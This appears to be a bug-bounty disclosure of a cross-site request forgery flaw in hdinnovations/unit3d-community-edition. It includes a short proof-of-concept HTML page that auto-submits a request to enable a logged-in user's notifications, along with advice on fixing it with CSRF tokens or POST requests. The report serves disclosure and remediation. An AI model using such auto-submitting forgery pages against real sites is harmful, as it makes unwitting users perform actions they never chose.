Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition
Aug 4th 2021
Attacker is able to enable a user notification if a logged in user visits attacker website.
🕵️♂️ Proof of Concept
- when you logged in open this
POC.htmlin a browser
- you can check your notification is enable
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://unit3d.site/users/UNIT3D/settings/notification/enable"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging user to unintentional enable notification.
Tested on Edge, firefox, chrome and safari.
You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 years ago
to join this conversation